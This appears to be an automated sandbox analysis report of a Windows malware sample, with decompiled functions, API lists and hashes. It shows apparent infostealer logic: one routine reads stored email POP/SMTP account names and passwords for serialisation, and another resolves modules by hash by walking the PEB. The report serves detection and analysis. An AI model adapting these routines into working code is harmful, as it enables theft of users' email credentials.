				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                      0x00403c15
                      0x00403c1d
                      0x00403c20

                      APIs
                      • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: DeleteFile
                      • String ID:
                      • API String ID: 4033686569-0
                      • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                      • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                      • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                      • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                      0x00402c2c
                      0x00402c34
                      0x00402c37

                      APIs
                      • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                      • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                      0x00403bfc
                      0x00403c04
                      0x00403c07

                      APIs
                      • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: CloseFind
                      • String ID:
                      • API String ID: 1863332320-0
                      • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                      • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                      • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                      • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                      0x00403bc4
                      0x00403bcc
                      0x00403bcf

                      APIs
                      • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                      • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                      • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                      • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                      0x00404a0d
                      0x00404a15
                      0x00404a18

                      APIs
                      • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                      • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                      0x00403b72
                      0x00403b7a
                      0x00403b7d

                      APIs
                      • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: ExistsFilePath
                      • String ID:
                      • API String ID: 1174141254-0
                      • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                      • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                      • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                      • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                      Download Yara Rule
                      APIs
                      • closesocket.WS2_32(00404EB0), ref: 00404DEB
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: closesocket
                      • String ID:
                      • API String ID: 2781271927-0
                      • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                      • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                      • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                      • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                      0x00403fac
                      0x00403fba
                      0x00403fbe

                      APIs
                      • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: FreeVirtual
                      • String ID:
                      • API String ID: 1263568516-0
                      • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                      • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                      • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                      • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                      0x0040647f
                      0x00406487
                      0x0040648a

                      APIs
                      • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                      • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                      • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                      • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004058EA, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}





                      0x004058f8
                      0x00405903
                      0x00405906

                      APIs
                      • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                      • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                      • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                      • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00405924, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}





                      0x00405932
                      0x0040593d
                      0x00405940

                      APIs
                      • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                      • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                      • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                      • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                      Download Yara Rule
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 0040438F
                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                      • VariantInit.OLEAUT32(?), ref: 004043C4
                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                      • VariantInit.OLEAUT32(?), ref: 00404414
                      • SysAllocString.OLEAUT32(?), ref: 00404419
                      • VariantInit.OLEAUT32(?), ref: 00404431
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                      • String ID:
                      • API String ID: 1312198159-0
                      • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                      • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                      Download Yara Rule
                      C-Code - Quality: 88%
                      			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                      0x0040d070
                      0x0040d080
                      0x0040d084
                      0x0040d086
                      0x0040d08c
                      0x0040d0a0
                      0x0040d0ae
                      0x0040d0bd
                      0x0040d0c0
                      0x0040d0c5
                      0x0040d0c9
                      0x0040d0e3
                      0x0040d0f2
                      0x0040d101
                      0x0040d104
                      0x0040d109
                      0x0040d110
                      0x0040d11e
                      0x0040d123
                      0x0040d126
                      0x0040d12d
                      0x0040d145
                      0x0040d154
                      0x0040d15a
                      0x0040d166
                      0x0040d174
                      0x0040d186
                      0x0040d18e
                      0x0040d19a
                      0x0040d1ac
                      0x0040d1ba
                      0x0040d1cc
                      0x0040d1d1
                      0x0040d1dd
                      0x0040d1e2
                      0x0040d1e7
                      0x0040d1e7
                      0x0040d1e7
                      0x0040d1eb
                      0x0040d1f1
                      0x0040d1f7
                      0x0040d1ff
                      0x0040d207
                      0x0040d20f
                      0x0040d217
                      0x0040d21f
                      0x0040d227
                      0x0040d230

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                      • API String ID: 0-2111798378
                      • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                      • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040317B, Relevance: .0, Instructions: 46COMMON
                      Download Yara Rule
                      C-Code - Quality: 90%
                      			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}














                      0x0040317f
                      0x00403180
                      0x00403180
                      0x00403180
                      0x0040318d
                      0x00403196
                      0x00403199
                      0x0040319b
                      0x004031a1
                      0x004031a9
                      0x004031ab
                      0x004031ac
                      0x004031ae
                      0x00000000
                      0x004031b0
                      0x004031b3
                      0x004031c2
                      0x004031c7
                      0x004031cd
                      0x004031e0
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004031cd
                      0x004031d7
                      0x004031dd
                      0x004031cf
                      0x004031cf
                      0x004031d1
                      0x004031d5
                      0x00000000

                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                      • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                      • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                      • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                      Uniqueness

                      Uniqueness Score: -1.00%